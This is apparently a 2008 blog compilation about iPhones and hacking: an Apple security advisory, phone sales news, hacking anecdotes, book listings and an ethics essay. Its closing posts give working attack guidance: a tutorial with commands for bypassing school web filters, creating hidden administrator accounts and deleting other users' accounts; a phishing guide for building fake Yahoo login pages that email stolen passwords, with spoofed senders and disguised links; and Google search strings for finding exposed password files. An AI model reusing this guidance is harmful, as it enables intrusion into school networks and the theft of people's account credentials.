To learn about other Security Updates, see "Apple Security Updates."
iPhone / iPod touch v1.1.3
Foundation
CVE-ID: CVE-2008-0035
Available for: iPhone v1.0 through v1.1.2, iPod touch v1.1 through 1.1.2
Impact: Accessing a maliciously crafted URL may lead to an application termination or arbitrary code execution
Description: A memory corruption issue exists in Safari's handling of URLs. By enticing a user to access a maliciously crafted URL, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation of URLs.
Passcode Lock
CVE-ID: CVE-2008-0034
Available for: iPhone v1.0 through v1.1.2
Impact: An unauthorized user may bypass the Passcode Lock and launch iPhone applications
Description: The Passcode Lock feature is designed to prevent applications from being launched unless the correct passcode is entered. An implementation issue in the handling of emergency calls allows users with physical access to an iPhone to launch an application without the passcode. This update addresses the issue through an improved check on the state of the Passcode Lock.
Safari
CVE-ID: CVE-2007-5858
Available for: iPhone v1.0 through v1.1.2, iPod touch v1.1 through 1.1.2
Impact: Visiting a malicious website may result in the disclosure of sensitive information
Description: WebKit allows a page to navigate the subframes of any other page. Visiting a maliciously crafted web page could trigger a cross-site scripting attack, which may lead to the disclosure of sensitive information. This update addresses the issue by implementing a stricter frame navigation policy.
Installation note:
This update is only available through iTunes, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an internet connection and have installed the latest version of iTunes from www.apple.com/itunes
iTunes will automatically check Apple's update server on its weekly schedule. When an update is detected, it will download it. When the iPhone or iPod touch is docked, iTunes will present the user with the option to install the update. We recommend applying the update immediately if possible. Selecting "Don't install" will present the option the next time you connect your iPhone or iPod touch.
The automatic update process may take up to a week depending on the day that iTunes checks for updates. You may manually obtain the update via the "Check for Update" button within iTunes. After doing this, the update can be applied when your iPhone or iPod touch is docked to your computer.
To verify that the iPhone or iPod touch has been updated:
Navigate to Settings
Click General
Click About The Version after applying this update will be "1.1.3 (4A93)" or later.

Apple Launches 16GB iPhone, 32GB iPod Touch

2008-02-13T10:17:00.000-08:00

Apple added new iPhone and iPod Touch models to its lineup of phones and music players Tuesday by doubling the maximum amount of storage space in each to 16GB.
The new top-of-the-line iPhone is priced at $499, Apple said. This is the first time since September, when Apple dropped the 4GB iPhone from its sales sheet, that the smart phone family has had multiple models. Apple continues to sell the 8GB iPhone for $399.
The iPod Touch -- for all intents and purposes an iPhone that cannot make or take calls -- now sports a 32GB model, also priced at $499, as a third option. Older models, including the $299 8GB and the $399 16GB configurations, remain available.
"This is just a bigger, faster kind of announcement," said Ezra Gottheil, analyst with Technology Business Research Inc., speculating that the timing was in part driven by an attempt to pump iPhone sales during a traditionally slow period. "Mobile phone [sales] aren't as seasonal as iPods, but they are seasonal."
Gottheil said he still expects Apple to make major changes to the iPhone in 2008, adding 3G capability and perhaps even true GPS functionality. "I'd put that around the middle of the year," he said today.
The larger-capacity iPhone and iPod Touch are available immediately at Apple's own retail stores, its online outlet and at resellers in the U.S.
The new iPhone's price tag is the same as the 4GB model's when the latter debuted in June 2007. Just over two months later, however, Apple CEO Steve Jobs ditched that model and slashed the price of the 8GB smartphone by $200, to $399.
Several users who said that they had recently bought 8GB iPhones asked on Apple's support forum whether they would be allowed to swap their purchase for the larger-sized model. Apple's policy is to accept returns within 14 days, although a 10% restocking fee applies if the iPhone box has been opened.
Other recent customers complained of the bump in storage. "I brought my iPhone about a month ago so I have no way of exchanging my phone," said a user pegged as SimonLee. "But Apple don't [sic] care about that because they just want me to go and buy a new one."
That kind of comment got little love on the forum. "Blah blah blah, go cry somewhere else," said Goshia on the same thread.
"Maybe the solution is to never bring out a new product. Oh, but then you'd complain too," said Simon Taylor. "So Apple, please stop developing new products or improving the ones you have. You are upsetting your customers. They would obviously prefer to use the original Apple II."

iPhone, the iPod Mobile is almost here!

2008-02-13T10:13:00.001-08:00

iPhone, an iPod which can hold thousands of songs even as you use it as a cellphone is coming, if rumors are anything to go by.The iPod Phone (lovingly called the iPhone, iMobile or iCell) is what Apple Computer has got up its sleeve, if iPod-trackers are to be believed. For long, iPod fans have been dreaming about an iPhone, which marries the technologies of the iPod and the cellphone. The iPhone, they say, would cater to all personal digital music entertainment and communications needs in a cute little package.Apple's teaser invite to select members of the media for the September unveiling of its surprise product has made imagination run wild among iPod aficionados. The Apple iPod mobile phone could be developed along with Motorola, with which it has a technology tie-up. It is clear that Motorola is developing an iTunes mobile phone, for which it has received FCC clearance. But the bigger news could be that it would be an iPod-Motorola mobile phone, which promises to be a killer product.It could be an iTunes Motorola mobile phone, which can play Apple's iTunes, say some. But as September 7 draws near, many are convinced that it is an iPhone (or iMobile or iCell if you like) and not the iTunes Motorola Mobile as expected before.If Apple is rolling out the iPhone on a standalone basis, it would be the Cupertino firm's path-breaking entry into the cellphone space. It is worth noting that many cellphone companies have already started hawking the music capability on their mobile phones. To survive and prosper, an iPod mobile is very much a necessity for Apple. A few weeks back, Nokia had denied rumors that it is developing a mobile phone which can play Apple's iTunes.But whether it is an iPhone or an iTunes Motorola which is still under wraps, it is clear that Apple analysts and iPod watchers have gone overboard, speculating about the possibilities of an iPod mobile phone. It is reported that US mobile phone service provider Cingular will be offering network support for the iPhone, which may be named iPod ROKR. The Wall Street Journal has reported, quoting sources, that the iPhone will actually be the Motorola ROKR, which will be sold with Cingular preloaded. It will be able to store thousands of songs and be a snazzy new mobile.Whether September 7 sees the birth of the iMobile or not, one thing is certain - anyone making such a musical mobile phone will meet stiff challenge from cellphone market leader Nokia, which is readying the N91 series as a music phone. The Nokia N91 will be capable of hoarding thousands of songs, just as the Apple iPod. The iCell has a tough cookie ahead, well entrenched and ready for battle.New York Times has also reported that the iROKR will have cellphone and music capabilities.Verizon already offers two models of mobile phones which let users transfer music from computers. It is also planning a rival online music service soon.The iPod phone won't be to the cellular service providers' liking, since they would like the music services to be provided by them. They fear that the iPhone would take away a lot of the revenues currently brought by the ring tones business. Watch this space for more on the iPhone!

Apple iPhone: Buy iPhone in India and in Your City!

2008-02-07T00:10:00.000-08:00

After its launch, iPhone was sold like no other phone on the face of the earth. Steve wants to hit the 10 million mark in 2008; a conservative estimate is between 2.5 to 2.8 million iPhones sold worldwide so far.
And I can tell you that the grey market in India is surely helping Steve achieve that target quickly. Everyone who was desperately waiting for the iPhone to hit India already has an iPhone, thanks to the unbeatable spirit of the grey market which makes such products available much before they are officially launched.
Now! How can you get an iPhone in India Or where can I buy iPhone in India? Believe me there are more than one ways to do this. Following is the list of online websites where you can order your own iPhone NOW!
iPhone Nirvana is one such site which is selling iPhones in India. Business operates out of Mathura and the iPhones are delivered anywhere in India. An 8GB unlocked iPhone would cost you INR 28,000 on this website.
Gadget Guru.in is selling iPhone for about 32,000 (Unlocked)
Gadget.in is selling iPhone for 34,000 (Unlocked)
Rediff has a list of sellers selling iPhones in India. Click here to see one such listing on Rediff. It sells iPhone for 29,400 or EMI 9,800 for 3 months;
eBay:
iPhones ranging from 25,000 to 40,000 are available on eBay, click here to see the list
Cheapest on eBay: 25,000, click here to see the listing
Those were online options, but if you are one of those who belong to touch, feel, and buy school of thought then you can buy iPhone at the following places in your city.
Paris - Chennai
Heera Panna - Mumbai
Pallika Bazaar - Delhi
Jagdish Market, Abids - Hyderabad
(Leave a comment if you know more places to buy iPhone in India)
All of these phone are unlocked and work with Airtel, Hutch, Idea and all the other GSM service providers. These will not work with CDMA technology such as TATA Indicom and Reliance.
Now you know where to buy iPhone in India and in your city.

My first wireless hacking experience

2008-02-06T03:19:00.001-08:00

"Okay, so I just got back to the hotel room after a night of partying. My Internet access has expired. Every time I open Firefox, it points me to the page to purchase a new session of access. I refuse; I've already paid my $10. But something interesting happens when I'm directed to the purchase page." Read the rest of this anecdote...

Multics Security

2008-02-06T03:18:00.003-08:00

"At a meeting in a Honeywell conference room, they handed me my password on a slip of paper. They'd exploited a bug in the obsolete interface put in for the XRAY facility, Jerry Grochow's thesis. This supervisor entry didn't do anything, but it accessed its arguments incorrectly, in a way that let the team cause the hardcore to patch itself. They'd used that hole to permanently install a tool that let them patch any location and read any file, and they'd obtained a copy of the password file from the MIT Multics site.
My code in the Multics User Control subsystem stored passwords one-way encrypted, at the suggestion of Joe Weizenbaum. I was no cryptanalyst; Joe had suggested I store the square of the password, but I knew people could take square roots, so I squared each password and ANDed with a mask to discard some bits. The Project ZARF folks then had to try 32 values instead of one, no big deal: except that there was a PL/I compiler bug in squaring long integers that gave wrong answers. If the compiler bug had been discovered and fixed, nobody would have been able to log in. The crackers had to construct some fancy tables to compensate for the 'Martian' arithmetic, but they still had only to try a few hundred values to invert the transform. (We quickly changed the encryption to a new stronger method, before Barry Wolman fixed the compiler bug.)"

Hacking Wireless Networks With The PSP

2008-02-06T03:18:00.001-08:00

"The other day, I parked my car on Constitution Avenue in Washington, D.C., killing some time before an event I was about to attend further down in D.C. I whipped out my PSP, while sitting in the car, and pleasured myself to a round of Tekken: Dark Ressurection. Mind you, it was nearly dark outside, and the lights in the car were off. Roughly ten minutes into my game, I noticed a certain figure standing outside my car. I quickly shutoff my PSP, turned the lights on, and rolled down the window. To my surprise, it was a police officer. He asked me what I was doing at that very moment. Now, of course, I am an adult, and an adult playing a PSP in the dark, inside his car, on the busiest street in D.C. is pretty awkward, one would think. So I replied and explained my situation, that I was early heading to a nightclub, and wanted to feed my addiction to a new game I had just bought. He didn't buy it. Not one bit at that." Read the rest of this anecdote...

How I Learned To Start Worrying and Hate The Bomb

2008-02-06T03:17:00.002-08:00

"Now, any of you who ain't congenital idiots raised in a rain barrel somewhere on the butt-end of nowhere will already have decoded the address to "U.S. Space Command, Cheyenne Mountain Air Force Base". Yeah, that's right. NORAD; the big tunnel complex under the mountain from which they be plannin' to fight World War III if it ever goes down. Huge walls of blinkenlights, 30-foot-thick blast doors, "We could tell you, sir, but then we'd have to kill you", the whole weird trip. Cornpone accents with their fingers on the pulse of the Apocalypse.
Oh, man, I said to myself. I have to talk to this woman. I haven't forgotten the nationwide media flap after 'War Games' came out. You remember, that silly movie where the kid with the voice-controlled IMSAI (snort) cracks into NORAD's computers and accidentally damn near starts a nuclear war? God damn; I'll bet the plot of that sucker is seared into the collective psyche of every security officer at Cheyenne Mountain, they probably screen the video every couple months just to keep the newbies on their toes." Read the rest of this story...

QuickBBS & RA 88-92

2008-02-06T03:17:00.001-08:00

"I had 110 echomail feeds coming in from Fidonet and several other mail networks. I remember being among the first SysOps to stumble into the Adam Hudson 20meg limit on a message base (which crashes the system and you lose every message). It still amazes me what we could get done with .BAT files and Frontdoor.
I remember getting a message from a user one day who kindly listed for me the entire contents on the root directory on my C: drive after gaining sysop priviledges and using my hidden menu to drop to DOS on my computer. He said, "if you create a menu option for ALT-254 on the numeric keypad, then when hackers try this they won't get sysop priviledges, they'll just be redirected to whatever that menu option takes them to." I was pretty shocked, went and tried it, and sure enough...
(In the early versions of Remote Access, anyone who hit alt-254 on the numeric keypad received user level 64000 and had access to any menu option.) That was my first lesson in not being able to trust the author of a program. Several months later, Andrew Milner fixed the "bug", but I'd already done away with any drop-to-DOS options." Source: http://books.slashdot.org/comments.pl?sid=197525&cid=16191797

Hacked by my host! Be Careful!

2008-02-06T03:16:00.000-08:00

"So, basically, I got hacked by my own host. No, it wasn't a mistake. No, the server didn't just go down. They hacked it so that they could upsell me on some $2000 security audit and package! So here is the evidence." Read the rest of this anecdote...

Criminal mastermind hacker let down by one detail

2008-02-06T03:15:00.002-08:00

"Strolling past a row of user cubes during his lunch break, this IT guy notices something odd: One PC's monitor has a full-screen DOS prompt with lots of commands already entered, reports a pilot fish on the scene.
"Looking at the commands, he realized that somebody was uploading an executable file to another machine," fish says. "The target was a company VIP's notebook, the name of the uploaded executable surely did look ugly, and the file was uploaded successfully. Read the rest of this anecdote...

The Dangers of Virus Writing/Hacking Combined

2008-02-06T03:15:00.001-08:00

Hackers who crossover into virus writing territory present the biggest danger to corporate computer systems as they perfect the 'blended threat' seen in recent virus outbreaks such as Sobig. That's the assertion of Sarah Gordon, senior research fellow at Symantec Security Response, who has worked with the White House and the FBI to research the psychological profile of hackers and virus writers. Gordon told silicon.com that hackers are driven by the motivation to complete a technology challenge and are usually not interested in the basic task of writing viruses and worms. "There are people in the virus writing community who hack and people in the hacking community who write viruses but for the most part they are very separate communities. The virus writers are seen at the lower end of the food chain," she said. But Gordon warned that creating a virus such as Sobig or Bugbear, only with much more damaging payloads, is well within the capabilities of even the most inexperienced hacker. "Many of the threats are the result of the crossover between hackers and virus writers. Erasing a hard drive is a couple of key strokes. It isn't rocket science. A hacker of any skill level could write a self-replicating program but most find it too boring," she said. And it seems the traditional stereotype of a spotty teenager hacking away in a dark bedroom is nothing more than a myth from the ******** "The population is diverse. It just takes the ability to manipulate a computer system. It is not guys sat in a basement with piercings everywhere. It could be the 50-year-old accountant because she is bored, or the boss' 15-year-old daughter, or your 9-year-old nephew," she said. There is also a distinct difference between hackers and virus writers, according to Gordon's research. "Virus writers have normal relationships with peers and families. Hackers tend to be more introverted. Hacking is a very personal thing. One is power and control and the other is letting go." Although Gordon works for a security software company, she says 'ethics' education at an early age would help prevent children and teenagers using their computer knowledge to cause damage. "One thing that is important is introducing ethics in technology at an early age. On the computer there is less context and security. Teaching them that there's a person on the end of that modem is important," she said.

Hacking School

2008-02-06T03:13:00.000-08:00

hi there... i'm no newbie to using event viewer, ... and typically it's an important tool for my daily assesment of what's going on with my XP computer. i realize, occasionally win XP will use the system account to log on and do routine maintenance. but have any of you ever seen win XP cite instances of 'guest' logging in and out? especially when the 'guest' account is disabled? ... upon waking this morning, i noticed all of this log on and log off activity which occurred while i was sleeping which was attributed to the guest account. if i look back in time in the even viewer, there are similar entries throughout, going back about three weeks at which point they are no longer present. it's always the same logon/logon entry and there is generally one other priviledged use entry coinciding with each logon/logoff entry. as said, my guest account is and has been disabled. the only *enabled* user account is my own, 'joel' account. here's a small snapshot of the general event viewer log from last night: ... IMAGE ... and the details for one of the 'guest' logins: ... IMAGE ... and the details for the 'guest' priviledged use instance: ... IMAGE ... anybody have any ideas? why would there be a 'guest' login when the 'guest' account is disabled? is this activity i should consider possibly to be hack related? maybe i should investigate further? ... more system details: - windows xp home: i use one single enabled user account and it is set as admin level. - my machine is one of three on a home network accessing the internet through DSL; connection is shared via a US Robotics Max G - i use latest version of zonealarm for firewall - i use latest version of AVG for virii protection - my machine connects to router/internet via a standard CAT 5 cable; i do not use wireless - at the time of the above incidents file sharing was enabled; i've since disabled - at the time of the above incidents, my computer/remote assistance was enabled; it's now disabled - remote access services are disabled; however, remote connection manager is enabled usb max 4G routher ... thanks in advance for any assistance ..

Hacking Exposed VoIP: Voice Over IP Security Secrets & Solutions (Hacking Exposed) (Paperback)

2008-02-06T03:12:00.002-08:00

List Price:
$49.99
Price:
$31.49 & this item ships for FREE with Super Saver Shipping. Details
You Save:
$18.50 (37%)
Availability: In Stock. Ships from and sold by Amazon.com. Gift-wrap available.
Only 5 left in stock--order soon (more on the way).
Want it delivered Thursday, February 7?
0)
{
FT_hours = (FT_days * 24) + FT_hours;
}
window.setTimeout("FT_getTime()", 1000);
if(FT_CurrentDisplayMin == FT_mins) return;
var ftCountdown = getTimeRemainingString( FT_hours, FT_mins );
for ( var i = 0; i

Order it in the next 12 hours and 17 minutes, and choose One-Day Shipping at checkout. See details

var timerDiv=document.getElementById("ftMessageTimer");
if (timerDiv && timerDiv.style)
timerDiv.style.display='inline';

46 used & new available from $21.24

Hacking Roomba: ExtremeTech (Paperback)

2008-02-06T03:12:00.001-08:00

List Price:
$24.99
Price:
$16.49 & eligible for FREE Super Saver Shipping on orders over $25. Details
You Save:
$8.50 (34%)
Upgrade this book for $4.99 more, and you can read, search, and annotate every page online. See details
Availability: In Stock. Ships from and sold by Amazon.com. Gift-wrap available.
Want it delivered Thursday, February 7?
0)
{
FT_hours = (FT_days * 24) + FT_hours;
}
window.setTimeout("FT_getTime()", 1000);
if(FT_CurrentDisplayMin == FT_mins) return;
var ftCountdown = getTimeRemainingString( FT_hours, FT_mins );
for ( var i = 0; i

Order it in the next 12 hours and 17 minutes, and choose One-Day Shipping at checkout. See details

var timerDiv=document.getElementById("ftMessageTimer");
if (timerDiv && timerDiv.style)
timerDiv.style.display='inline';

39 used & new available from $2.93

Hack Cartoons

2008-02-06T03:10:00.000-08:00

You are looking at the "hack" cartoon page from the CartoonStock directory. Follow the links on this page to search on other topics or to purchase reproduction rights for any of these images or merchandise incorporating the cartoons.
This page only includes cartoons from our main archive, see also our NewsCartoon Service and our Vintage Cartoons.

Hackers and Hacking - Related Topics

2008-02-06T03:08:00.000-08:00

Ethical Hacking - A Fullstop on E-system

2008-02-06T03:07:00.000-08:00

A Hacking Awareness Announcement By Kalpesh Sharma

Takeaways
Truth behind "Ethical Hacking".
Fact behind "Ankit Fadia".
Be Aware while choosing.

Passion or Madness: Now days, it has become a passion to learn about hacking and information security. Sometimes I do not understand that whether it is a passion or a kind of madness. This passion has resulted due to several news articles, media stories and the excitement showing hacking related thrills in films. But, on the other hand there is a fact also that very few peoples know anything in-depth about the topic of hacking and information security. So, I would suggest that without adequate knowledge please do not get mad behind passion. Sometimes this passion may become dangerous from the legal point of view. There is nothing wrong to gain expertise, but there is need to realize a fact about incorrect issues behind hacking. I will come to this topic in depth, later in the same chapter.
Be Alert and Aware: Do you think that hacking is an expert level work? Do you think that information security and hacking are one and same things? If yes! Then you are absolutely wrong. Many children in the age group of 14-16 years are having sufficient knowledge to hack any website or collect important data facts from the internet. So, internet being the big source of information it's a child game to perform hacking related activities. Many hackers whose aim is to just earn money from you, they give seminars and workshops along with misguide you that, "learn hacking in an ethical way for a brilliant career". But, I am not going to explain in this way, to any of you. Instead, I would like to explain the fact in a positive way with a positive attitude. A teacher's task is to show right path to students and not misguide them for gaining their personal benefits. So I would suggest that instead of going for the knowledge of hacking, gain the knowledge by learning something, which is said to be an expert level job. And this expert level job is known as information security expertise in technical terms. Hope you might have understood the difference between hacking (not expert level job) and information security (expert level job) from this topic. So, be alert from such misguidance.

Other then passion, one more side of coin also exists. Many institutes and independent peoples call themselves hacker and/or information security experts. But the reality behind their expertise and skills gets displayed in front of non-technical peoples and the victims who undergo for training, courses, certifications, seminars and workshop with such types of self-claimed hackers or institutes, when such victims and non-technical peoples realize that they are not satisfied for which they have spent time and money. The actual reality behind fooling is that the peoples who undergo for such seminars, workshops, courses, etc. most probably undergo through a psychology that, "the person or institute from which we will receive knowledge during the training sessions is an expert or is providing quality education as he was published by media agencies or that it's a branded name in market for related subject talent or that he is an author of any book". I believe in practical, official and those tasks or actions for which evidence lies in front of my eyes. Thus, I am trying to explain to everyone that always be alert and aware, so that your hardly earned income does not get spend in such unnecessary waste of time.

I will give you my own example here! I have several articles about me in various newspapers and media agencies, but this doesn't mean that I am showing you the right path or that I am an expert. For example may be possible that I am a hacker, but this does not prove that I am an expert. So, expert level job is a totally different matter. The explanation about difference between hacking and expertise will come in next chapters So, first check out the level of my knowledge, how much practically I am able to prove my expertise, whether I am official & legal while undergoing for such tasks and finally the evidence part that whatever actions I undertake are proved right in front of eyes, instead of just talking theoretically. Always confirm yourself first, that you are learning with right person or institute or just wasting your time and money. May be possible that peoples might be receiving fees from you and in turn give you the knowledge of something(any other subject or topic about information technology field), which is not even single percent part of hacking or information security related topics. This happens most probably with non-technical peoples or fresher in information technology field.

False Publicity: Secondly, confirm that you are at least gaining the knowledge up to a level for which you have paid a particular amount. Don't just go behind false publicities before you confirm yourself and your inner feelings say that you are moving on right path. As concerns to book publishers, media agencies and films, I would like to confirm that none of them might be having full and fledge technical knowledge about information security field as concerns to my knowledge. It's similar to following examples on me:

A person comes and tells me that you are an expert please suggest me some medicines which can eradicate my serious disease of cancer. I am a technical professional and not a biological professional who is going to solve this problem.
A person comes and tells me that suggest a good lawyer who can defend my case in court. Now tell me how do I give suggestion as to which lawyer can prove this person innocent in court of law.
Thus, I can't do anything or have any knowledge about any field which is not my subject or area of work. Similarly, even media peoples, book publishers and film makers does not have adequate or complete knowledge and they believe the statement to be true which is explained to them by many misguiding self-claimed hackers and/or reputed institutes. So, these peoples are also not responsible for some of these kinds of activities published by them on any medium.

Language Troubling: There is one more part of cheating called use of useless and complicated language in order to misguide students and especially technically sound professionals. This is a very intelligent part of stunt used by many self claimed security peoples to misguide others. Usually when any self claimed hacker or institute doesn't know anything about complicated or expert level topic, and in such situation they want to include expert level topics in their study material without having any expert level knowledge; such peoples use very complicated words of English and prepare the contents in such a manner that it becomes very difficult to understand even for the persons who are fluent in English. A very complicated coding and useless technical terms are used in their study material, so that the victims cannot understand or claim against such self claimed hackers and so called specialized institutes, in a legal way. When any victim (user of such material) goes through such study materials and courses as well as certifications, they become helpless to understand such complicated and misguiding language, filled up of useless and non-understandable technical terms. Now, when they don't understand anything the common psychology of such victims understands that, "it's a part of expert level work and that's why they are unable to understand the matter or that he won't be able to complete this job successfully as he is not talented" and so on. In this way, the victims think themselves responsible for not understanding the expert level work. But they do not know that they have never been taught anything, which can be called an expert level education or job. This is what I am trying to explain you that it is not your fault, instead it is a stunt used by such self claimed hackers and institutes who tries to sell their services and materials by misguiding others with the help of language troubling. So here also there is a need to be aware and alert of any services or material offered by any self claimed hacker and specialized institutions. They just have an intention of earning a huge amount from you and do not have any feelings for the information security field, students or the nation in any way. This is the reason they use difficult word, complicated terms and technical coding in order misguide others so that no one knows about their level of their knowledge.

Finally: Thus, finally the topics should be very clear that

Don't get mad behind passion and be serious about legal activities.
Be alert that you are receiving right knowledge for which you have paid.
Be aware of what you are undergoing for is the right one for which you have paid and that too join after checking out.
Be practical, official and believe only that which happens only in front of your eyes. You should have the guts to demand for evidence.
Check the simplification of language used in the study material whether you can go through it and understand it or not, before purchasing any services or materials from self claimed hackers or so called expert level institutes which claims to be specialized in information security area.
Try to understand the difference between a truth and a false, correct and incorrect, etc. by going in depth about every fact related to services, products or materials you are offered by any self claimed hacker or so called specialized institutes.
Even if this is in my case, first check out with my study material, then get into the depth of my work background and then only purchase any services, products or material offered by me or on behalf of me.
Don't get misguided behind media hype or false publicity of any person or institute without checking through it.

Software protection: security's last stand?

2008-02-06T03:06:00.000-08:00

Given that application software protection is necessary, what form and function should it take? There are three principal forms of protection: watermarking, obfuscation, and application performance degradation. These techniques perform three main functions: detection of attempts to pirate, misuse, or tamper with software, protection of software against those attempts, and alteration of the software to ensure that its functionality degrades in an undetectable manner if protection fails. These defenses are required on hardware ranging from single processors to small computer clusters to traditional supercomputers to wide-area distributed computing.

hack to add related news topics to

2008-02-06T03:04:00.000-08:00

what would determine the related topics? if it's just stuff in the same category you can do that easily
im pretty sure you could just include headlines in the full news template - but just to be safe let's make an actual mod for it

find:
CODE if(!$found){
echo("

Can not find an article with id: ". @(int) htmlspecialchars($id)."

");
$CN_HALT = TRUE;
break 1;
}
add after:
CODEecho "";

obviously you can change the attributes of the iframe, or the show_news.php
if you need it to be certain colors or something make a file in the cute news folder called headlines.php (or something) and tell it to include show_news.php with those variables (see readme) then apply coloring and it'll show up

yahoo messenger multi login

2008-01-23T11:15:00.000-08:00

FOR MULTILOGIN IN YAHOOMESSENGER
1.open notepad

2.paste these codes

REGEDIT4

[HKEY_CURRENT_USER\Software\yahoo\pager\Test]
"Plural"=dword:00000001

3.save it as multi.reg

4. either double click on this file or rt click on it and select merge option. (aim is to merge this settings into registry

hacing school

2008-01-23T11:13:00.002-08:00

NOTICE: TO ALL CONCERNED Certain text files and messages contained on this site deal with activities and devices which would be in violation of various Federal, State, and local laws if actually carried out or constructed. The webmasters of this site do not advocate the breaking of any law. Our text files and message bases are for informational purposes only. We recommend that you contact your local law enforcement officials before undertaking any project based upon any information obtained from this or any other web site. We do not guarantee that any of the information contained on this system is correct, workable, or factual. We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site.

Hacking your school (Version 1.1) by Timmeh

Hacking at school

This tutorial is aimed at school servers running Windows underneath (most of them do). It works definitely with Windows 98, 2000, Me, and XP. never tried it with 95, but it should work anyway. However, schools can stop Batch files from working, but it is very uncommon for them to be that switched on.

There are problems with school servers, and they mostly come back to the basic architecture of the system - so the admins are unlikely to do anything about it! In this article I will discuss how to bypass web filtering software at school, send messages everywhere you want, create admin accounts, modify others' accounts, and generally cause havok. Please note that I ahve refrained from giving away information that will actually screw up your school server, though intelligent thinkers will work it out. THis is because, for god sakes, this is a school! Don't screw them up!

How to get it all moving

An MS-DOS prompt is the best way to do stuff, because most admins don't think its possible to get them and, if they do , they just can't do anything much about it.

First, open a notepad file (if your school blocks notepad, open a webpage, right click and go to view source. hey presto, notepad!). Now, write

command.com

and save the file as batch.bat, or anything with the extension .bat . Open this file and it will give you a command prompt (for more information on why this works, look to the end of the article). REMEMBER TO DELETE THIS FILE ONCE YOU'VE FINISHED!!! if the admins see it, they will kill you

Bypassing that pesky web filtering

Well, now you've got a command prompt, it's time to visit whatever site you want. Now, there are plenty of ways to bypass poorly constructed filtering, but I'm going to take it for granted that your school has stopped these. This one, as far as I know, will never be stopped.

in your command prompt, type

ping hackthissite.org

or anything else you wanna visit. Now you should have a load of info, including delay times and, most importantly, an IP address for the website. Simply type this IP address into the address bar, preceded by http://, and you'll be able to access the page!

For example: http://197.57.189.10 etc.

Now, I've noticed a lot of people have been saying that there are other ways to bypass web filtering, and there are. I am only mentioning the best method I know. Others you might want to try are:

1) Using a translator, like Altavista's Babel fish, to translate the page from japanese of something to english. This will bypass the filtering and won't translate the page, since it's already in English.

2) When you search up the site on Google, there will be a link saying 'Cache'. Click that and you should be on.

3) Use a proxy. I recommend Proxify.com. If your school has blocked it, search it up on Google and do the above. Then you can search to your heart's content

Sending messages out over the network

Okay, here's how to send crazy messages to everyone in your school on a computer. In your command prompt, type

Net Send * "The server is h4x0r3d"

*Note: may not be necessary, depending on how many your school has access too. If it's just one, you can leave it out*

Where is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine. It tends to be called the same as your school, or something like it. So, at my school, I use

Net Send Varndean * "The server is h4x0r3d"

The asterisk denotes wildcard sending, or sending to every computer in the domain. You can swap this for people's accounts, for example

NetSend Varndean dan,jimmy,admin "The server is h4x0r3d"

use commas to divide the names and NO SPACES between them.

Adding/modifying user accounts

Now that you have a command prompt, you can add a new user (ie yourself) like so

C:>net user username /ADD

where username is the name of your new account. And remember, try and make it look inconspicuous, then they'll just think its a student who really is at school, when really, the person doesn't EXIST! IF you wanna have a password, use this instead:

C:>net user username password /ADD

where password is the password you want to have. So for instance the above would create an account called 'username', with the password being 'password'. The below would have a username of 'JohnSmith' and a password of 'fruity'

C:>net user JohnSmith fruity /ADD

Right then, now that we can create accounts, let's delete them

C:>net user JohnSmith /DELETE

This will delete poor liddle JohnSmith's account. Awww. Do it to you enemies:P no only joking becuase they could have important work... well okay only if you REALLY hate them

Let's give you admin priveleges

C:>net localgroup administrator JohnSmith /ADD

This will make JohnSmith an admin. Remember that some schools may not call their admins 'adminstrator' and so you need to find out the name of the local group they belong to.

You can list all the localgroups by typing

C:>net localgroup

Running .exe files you can't usually run

In the command prompt, use cd (change directory) to go to where the file is, use DIR to get the name of it, and put a shortcut of it on to a floppy. Run the program off the floppy disk.

Well, I hope this article helped a bit. Please vote for me if you liked it Also, please don't go round screwing up your school servers, they are providing them free to you to help your learning.

I will add more as I learn more and remember stuff (I think I've left some stuff out - this article could get very long...)

Fake yahoo email login.

2008-01-23T11:13:00.001-08:00

U can make a fake url login page, email ur victim to visit ur fake login page / or just email ur fake login page (see yahoo email tips) and when he/she types the username and pass, the info 'll be send to u ex. by a cgi script. Cgi scripts can be found on the net. Although u can get here one.

NOTE: If u r going to email ur fake login page, on the pass file (of the form), check its properties and change it to normal (if not, when the user tries to type his/her password within the yahoo email account, will be prompted not to type it). Yahoo recognizes pass fields and prompt users about it. Yahoo also recognizes info send anywhere else than yahoo and prompt the user.

NOTE: U can also use cgi scripts from ur own site (must support cgi).

We are providing a working example of a fake login page, with an external cgi script, which 'll email u the username and the password. Just download the zip file HERE and follow the below instructions.

1. Open the ready.htm file, Edit (file menu top left) -> Select all and press CTRL+C.
2. Open ur email client or account (must support html ex. yahoo email), compose a new email and press CTRL+V in the text field.
3. Send it to ur victim(s).

The ready.htm file 'll proceed the info to am20forces@yahoo.com. So just change it to ur email address (open ready.htm with ex. notepad, search for am20forces@yahoo.com text and change it). Also with the same way change the title (not the name of ready.htm, the title within the html codes) to something like "Yahoo email restore".

NOTE: The fake login page its a quick build page, but the job its done perfectly. Just remember to change the info as mention above and that the received email 'll contain username and "email address" (which "email address" its the password).

Instead of the page, u can send a link to the fake login page. U can obscure the link (read in "Tutorials" -> "Obscure url") or just fake the displayed text of the link using ex. Microsoft Word (click the example to see) ex. http://www.mail.yahoo.com/restore.asp?id=3587496 or combined the methods.

NOTE: Use a fake email address (u can use a fake email sender app ex. similar to "ELBOMB" in "Others" download section) ex. YAHOO_ADMIN@yahoo_bot.com with description to be "ACCOUNT ERROR". Lots of ppl receives such emails, claiming that they must relogin to activate their account due to an error etc.

In the zip file, u can also find a cgi submission script, which u can edit/modify as u like and upload it on ur site. Its preferable to create ur own (if u 've the knowledge) cgi script, or just modify one (and not using a cgi sciprt provider).
tm file on ur site (using web service provider ex. geocities), remember to upload all the files included (images etc.) in the "ready" folder.

Google Hacking

2008-01-23T11:12:00.000-08:00

These methods will be easily understood by the Hackers
Any help for the Novice Hackers Please drop in your Comments : Rahul

u can also drop in ur E - Mail Id's to be mailed a detailed Presentation on Google HACKING

Using Google, and some finely crafted searches we can find a lot of interesting information.

For Example we can find:

Credit Card Numbers

Passwords

Software / MP3's

...... (and on and on and on) Presented below is just a sample of interesting searches that we can send to google to obtain info that some people might not want us having.. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in.

Try a few of these searches:

intitle:"Index of" passwords modified
allinurl:auth_user_file.txt
"access denied for user" "using password"
"A syntax error has occurred" filetype:ihtml
